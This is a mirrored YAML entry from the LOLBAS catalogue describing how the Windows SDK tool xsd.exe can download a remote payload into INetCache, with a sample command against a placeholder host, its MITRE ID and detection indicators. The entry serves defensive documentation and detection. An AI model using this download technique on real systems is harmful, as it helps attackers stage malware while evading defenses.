mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-01 01:27:53 +01:00
24 lines
773 B
YAML
24 lines
773 B
YAML
|
---
|
||
|
Name: xsd.exe
|
||
|
Description: XML Schema Definition Tool included with the Windows Software Development Kit (SDK).
|
||
|
Author: Avihay Eldad
|
||
|
Created: 2024-04-09
|
||
|
Commands:
|
||
|
- Command: xsd.exe http://example.com/payload
|
||
|
Description: Downloads payload from remote server
|
||
|
Usecase: It will download a remote payload and place it in INetCache
|
||
|
Category: Download
|
||
|
Privileges: User
|
||
|
MitreID: T1105
|
||
|
OperatingSystem: Windows
|
||
|
Tags:
|
||
|
- Download: INetCache
|
||
|
Full_Path:
|
||
|
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\{version}\bin\NETFX {version} Tools\xsd.exe
|
||
|
Detection:
|
||
|
- IOC: URL on a xsd.exe command line
|
||
|
- IOC: xsd.exe making unexpected network connections or DNS requests
|
||
|
Acknowledgement:
|
||
|
- Person: Avihay Eldad
|
||
|
Handle: '@AvihayEldad'
|